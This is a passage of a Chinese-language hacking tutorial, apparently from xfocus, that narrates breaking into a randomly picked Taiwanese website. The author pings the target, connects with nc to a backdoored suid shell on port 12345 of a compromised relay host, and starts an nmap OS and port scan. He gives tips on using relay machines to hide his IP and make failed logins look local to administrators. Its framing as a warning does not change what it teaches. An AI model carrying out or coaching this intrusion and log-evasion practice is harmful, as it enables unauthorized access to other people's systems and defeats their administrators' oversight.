(quack_at_xfocus.org)
入侵过程
by quack
本文的写作目的仅仅是为了给某些粗心大意的网络管理人员一个警告――internet是
有趣但十分脆弱的,当你的计算机放在互联网上给人们提供信息与服务的同时,会引
来网络中的“好奇者”的窥探。而安全性与便利性是一对矛盾……在你对自己的网络
做了一个安全策略考量之后,你应该确定你愿意以多大的风险来使用一些方便的服务,
当然这些服务――比如rlogin,可能只会使你少输入一次密码……
首先是确定目标――撞大运乱挑一个吧,试试能不能成功……呵,于是登上yahoo,上
taiwan的站点小遛了一下……唔,这个还不错,我们姑且称其为www.targe.com……还
是先ping一下看看情势如何――别碰上有墙的就逊了……
C:>ping www.targe.com
Pinging www.targe.com [111.111.111.111] with 32 bytes of data:
Reply from 111.111.111.111: bytes=32 time=621ms TTL=241
Reply from 111.111.111.111: bytes=32 time=620ms TTL=241
Reply from 111.111.111.111: bytes=32 time=611ms TTL=241
Reply from 111.111.111.111: bytes=32 time=591ms TTL=241
速度还是很快的嘛……那就开始吧……
先登上某台跳板台湾的机器――这样安全一些,不会留下你自己的IP……(当然,说句
题外话――这样要追查到还不是很困难,曾经有个朋友同我说过,南方某大学一次被
黑,种种迹象都表明黑客来自美国,IP、更改后主页上留下的话语……朋友受托去补
漏查源,发现那IP是美国一个提供免费shell的服务供应商……于是申请了一个shell,
通过一系列动作成为root,查看系统日志――真相大白,IP居然指向那家大学自身)。
通过跳板还有一个好处――如果你的尝试失败,在系统日志里留下来的是台湾本土的
IP,这样的登陆失败命令比较不会引起系统管理员的注意……
C:>nc ... 12345
就登上跳板了,12345端口里我预留了一个suid的shell……
好了,祭起宝刀――nmap……
./nmap -sT -O 111.111.111.111
Starting nmap V. 2.3BETA12 by Fyodor ([email protected], www.insecure.org/nmap/)
Interesting ports on www.targe.com (111.111.111.111):